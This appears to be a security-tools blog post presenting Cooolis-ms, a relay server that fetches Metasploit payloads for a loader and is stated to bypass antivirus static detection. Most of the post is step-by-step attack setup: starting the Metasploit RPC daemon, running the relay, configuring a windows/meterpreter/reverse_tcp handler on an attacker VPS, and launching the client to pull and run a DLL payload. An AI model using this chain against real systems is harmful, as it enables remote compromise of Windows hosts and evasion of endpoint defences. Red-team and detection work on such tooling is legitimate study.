Cooolis-MS : A Server That Supports The Metasploit Framework RPC

Cooolis-ms is a server that supports Metasploit Framework RPC. It is used to work for Shellcode and PE loader, bypassing the static detection of anti-virus software to a certain extent, and allows the Cooolis-ms server to perform with the Metasploit server separate.

Loader execution process:

  • connect to Cooolis-Server
  • Cooolis-Server connects to Metasploit RPC server
  • retrieve the payload and send it back to the loader

Advantages of the project

  • small volume (<600KB)
  • Support all Metasploit Payload
  • Simple parameters
  • Single file
  • Support separation

How to install?

  • Choice 1 > Docker deployment (recommend)

Click here for YouTube demo.

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms/Docker
$ docker-compose up -d

Default listening port:8899

  • Choice 2 > Source code deployment

$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms
$ pip3 install -r requirements.txt
$ python3 server.py -h

How to use?

If you are deploying with Docker, please start directly from the third step.

Assuming this is my VPS: 10.20.56.41

  • First step, start Metasploit RPC server
    • Start Metasploit RPC server:

$ msfrpcd -U msf -P msf -u /api/1.0/ -a 127.0.0.1

  • Second step, start the Cooolis-ms server

Make it connect to RPC and listen to a port for sending payload:

$ python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 10.20.56.41

  • Third step, configure Metasploit listener

msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST 10.20.56.41
msf5 > set LPORT 8876
msf5 > exploit -j

  • Fourth step, start the Cooolis-ms client

Cooolis-ms.exe -p windows/meterpreter/reverse_tcp -o LHOST=10.20.56.41,LPORT=8876,Format=dll -H 10.20.56.41 -P

Note

  • The -o parameter of Cooolis-ms.exe should correspond to the msf configuration.
  • Since this project relies on the open source project MemoryModule, it can only support PAYLOAD in DLL format. Need to add Format=dll after the -o parameter.
R K

Recent Posts

How AI Puts Data Security at Risk

Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…

22 hours ago

The Evolution of Cloud Technology: Where We Started and Where We’re Headed

Image credit:pexels.com If you think back to the early days of personal computing, you probably…

5 days ago

The Evolution of Online Finance Tools In a Tech-Driven World

In an era defined by technological innovation, the way people handle and understand money has…

5 days ago

A Complete Guide to Lenso.ai and Its Reverse Image Search Capabilities

The online world becomes more visually driven with every passing year. Images spread across websites,…

6 days ago

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

1 month ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

1 month ago